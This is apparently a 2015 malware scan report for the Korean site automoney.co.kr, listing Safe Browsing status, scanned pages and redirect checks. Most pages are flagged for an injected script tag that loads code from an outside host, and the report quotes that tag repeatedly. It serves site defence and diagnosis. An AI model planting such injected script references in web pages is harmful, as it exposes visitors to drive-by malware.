Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=automoney.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://automoney.co.kr/ | 200 OK Content-Length: 20013 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786992"></script> | ||
http://automoney.co.kr/index.html | 200 OK Content-Length: 20013 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786992"></script> | ||
http://automoney.co.kr/automoney_company1.html | 200 OK Content-Length: 17905 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/automoney_index.html | 200 OK Content-Length: 18016 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/web_m_1.html | 200 OK Content-Length: 21231 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/erp_index.html | 200 OK Content-Length: 14938 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/download_index.html | 200 OK Content-Length: 15019 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/buy_index.html | 200 OK Content-Length: 13873 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/consult_index.html | 200 OK Content-Length: 13074 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/test404page.js | 404 Not Found Content-Length: 311 Content-Type: text/html | clean |
http://automoney.co.kr/download_upgrade.html | 200 OK Content-Length: 14892 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/download_etc.html | 200 OK Content-Length: 14962 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=18786998"></script> | ||
http://automoney.co.kr/easy_demo.exe | 200 OK Content-Length: 300896 Content-Type: application/x-msdownload | clean |
http://automoney.co.kr/semi_light_demo.exe | 200 OK Content-Length: 302341 Content-Type: application/x-msdownload | clean |
http://automoney.co.kr/semi_plus_demo.exe | 200 OK Content-Length: 302341 Content-Type: application/x-msdownload | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: automoney.co.kr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 29 Jan 2015 08:35:42 GMT
Server: Hanbiro Server Centre(Powered by NetBSD)
Content-Type: text/html
X-Powered-By: PHP/5.2.12
GET / HTTP/1.1
Host: automoney.co.kr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 29 Jan 2015 08:35:42 GMT
Server: Hanbiro Server Centre(Powered by NetBSD)
Content-Type: text/html
X-Powered-By: PHP/5.2.12
Second query (visit from search engine):
GET / HTTP/1.1
Host: automoney.co.kr
Referer: http://www.google.com/search?q=automoney.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: automoney.co.kr
Referer: http://www.google.com/search?q=automoney.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.